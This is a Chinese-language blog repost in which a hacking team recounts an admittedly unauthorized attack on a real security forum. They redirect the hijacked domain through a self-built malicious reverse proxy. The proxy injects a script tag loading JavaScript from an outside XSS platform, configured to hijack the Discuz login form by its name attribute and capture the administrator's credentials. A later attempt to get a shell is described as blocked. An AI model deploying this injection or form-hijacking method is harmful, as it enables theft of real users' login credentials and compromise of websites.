渗透测试

部署恶意CDN表单劫持渗透XX网络安全论坛

字号+ 作者:nosafe_team 来源:转载 2016-12-15 09:54 我要评论( )

关于恶意反向代理的部署,我们内部自制了一个自动化部署的工具 该工具特点作用就是可以自动化部署一个恶意反向代理(可以简单理解为恶意CDN) 来达到攻击操作的同时......

关于恶意反向代理的部署,我们内部自制了一个自动化部署的工具
 
该工具特点作用就是可以自动化部署一个恶意反向代理(可以简单理解为恶意CDN) 来达到攻击操作的同时并且不会影响网站原功能。
 
先放两张成功截图..以防止你们没兴趣看完
 
目标域名www.xxxx.com
   


本次渗透测试依然是我们内部协作共同渗透,而且也有了白客联盟失败的经验,让我们这次攻击从前期到收尾一共用了仅仅不到两小时。
 
这次渗透测试依然由P4ss同志进行前期踩点和获取域名权限的工作。
 
后期针对discuz的表单劫持JavaScript制作和xss平台的调试则由Fleey同志完成,如果没有他的话我自己调试js估计是没招了。。
 

收尾工作由我完成,包括制作恶意反向代理和尝试getshell(由于存在云锁,且限制后台访问,Getshell以失败告终)
 
----------------------------------以下为正文--------------------------------------------------------------------------
 
 
由于劫持域名的过程牵扯到社工和站长个人信息以及域名商安全问题,这里不做劫持域名的演示。
 
首先老样子 将www. xxxx.com 按照我们的程序要求cname解析至fuck.hackgo.top
 
该工具特点作用就是可以自动化部署一个恶意反向代理(可以简单理解为恶意CDN) 来达到攻击操作的同时并且不会影响网站原功能。仅限核心使用
 

之后设置替换字符,这里我们老样子 设置被替换字符为</body>替换的字符为<script src=http://vxss.cc/wC0j9v></script></body>
之后提交,与此同时www. xxxx.com已经被解析到我们的劫持平台了 我们刷新看一下他网站的情况
 
这里可以明显看到已经替换成功,我们的js已经加入进去了
这里来讲一下插入的这个js的作用
该js由fleey同志调试配置。
首先进入我们的xss平台 http://vxss.cc/ 这里我们已经配置好了现成的表单劫持模块
我们创建一个项目,选择表单劫持,和xss.js模块。 表单劫持有两个参数 分别问formname和formid 所对应的分别为表单name值和表单id值
由于discuz的特点。discuz的登录表单id是全局随机的。 像这样
每有一次访问就会刷新一次id的随机参数 类似Lq123 LQ481这样的
不过他的表单name值是固定的 所以我们还是可以很好的解决 ,只需要将formname值设置为login formid为空格即可
这样该js即可劫持到任何表单name为login的内容
我们配置好之后。等待站长登录即可。
  

为了催站长上钩..我找他换了个友情链接。。

当我尝试去登陆discuz后台admin.php时发现网站为404...



问了一下站长。。发现是云锁的功能


与此同时我的心情是....无奈的。

不过好在可以进入UCenter..
 
这里也是站长的一个疏忽。。。
但是因为写这篇文章的时候并未经过授权,所以就未进行getshell等高风险操作。渗透测试应做到点到为止
作者:F4ther &NoSafe团队

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Security/407.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 记一次tomcat部署拿shell提权

    记一次tomcat部署拿shell提权

    2016-11-28 14:42

  • 记一次jboss部署拿shell

    记一次jboss部署拿shell

    2016-11-27 16:43

网友点评
暂时未开启评论功能~